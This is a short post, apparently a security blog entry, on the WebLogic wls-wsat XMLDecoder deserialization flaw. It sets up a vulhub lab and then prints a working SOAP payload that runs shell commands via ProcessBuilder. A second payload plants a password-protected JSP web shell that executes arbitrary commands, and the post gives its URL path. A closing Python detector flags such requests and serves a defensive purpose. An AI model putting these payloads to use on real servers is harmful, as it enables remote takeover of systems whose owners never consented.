# WebLogic XML vulnerability notes

2018-02-01 02:18:27 Steven Xeldax

## 0x01 weblogic docker vulhub

Bring up the vulhub Docker environment:

```
docker-compose build
docker-compose up -d
```

## 0x02 POC

```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>calc</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```

Send a POST request to /wls-wsat/CoordinatorPortType with the content above as the body and Content-Type set to text/xml. Another URI known so far to work is CoordinatorPortType11.

> The server returns
>
> ```
> <faultcode>S:Server</faultcode>
> <faultstring>0</faultstring>
> ```
>
> which indicates the command executed successfully.

## 0x03 Getshell

```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/a.jsp</string>
          <void method="println">
            <string><![CDATA[<%if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>");} %>]]></string>
          </void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```

This writes a.jsp into the war directory of bea_wls9_async_response, bea_wls_internal or uddiexplorer under tmp/_WL_internal (the exact path is up to you). The corresponding web path is

```
http://x.x.x.x:7001/bea_wls_internal/a.jsp
```
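Both requests above share one detectable shape: a `WorkContext` SOAP header whose content is a `java.beans.XMLDecoder` document. The following Python detector is an added example (not code from the post) that a defender can run over captured request bodies to flag that shape; the sample bodies are constructed, and the class list is just the two classes the payloads on this page instantiate.

```python
"""Flag SOAP requests whose WorkContext header carries a java.beans.XMLDecoder
payload, the pattern used by the wls-wsat requests described above."""
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"
# Classes the payloads on this page instantiate; extend the set as needed.
DANGEROUS_CLASSES = {"java.lang.ProcessBuilder", "java.io.PrintWriter"}


def inspect_soap(body: str) -> dict:
    """Classify one request body as clean, suspicious, malicious or unparseable."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return {"verdict": "unparseable", "classes": []}
    header = root.find(f"{{{SOAP_NS}}}Header")
    work = header.find(f"{{{WORK_NS}}}WorkContext") if header is not None else None
    if work is None or len(work) == 0:
        return {"verdict": "clean", "classes": []}
    # A <java> element requesting XMLDecoder inside WorkContext is the exploit primitive;
    # the nested <java><java ...> variant is covered because iter() walks all descendants.
    decoder = any(el.get("class") == "java.beans.XMLDecoder" for el in work.iter("java"))
    classes = sorted({el.get("class") for el in work.iter()
                      if el.get("class") in DANGEROUS_CLASSES})
    # Any other child elements under WorkContext are unusual and worth a look.
    verdict = "malicious" if (decoder or classes) else "suspicious"
    return {"verdict": verdict, "classes": classes}


# Constructed samples (not real traffic): a minimal XMLDecoder payload and a benign call.
SAMPLE_RCE = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">
<void index="0"><string>id</string></void></array><void method="start"/></void>
</java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

SAMPLE_BENIGN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>"""

if __name__ == "__main__":
    for name, sample in (("rce", SAMPLE_RCE), ("benign", SAMPLE_BENIGN)):
        print(name, inspect_soap(sample))
```

Wire `inspect_soap` into whatever sees the raw POST body (a WAF hook, a proxy log parser) and alert on anything other than `clean`.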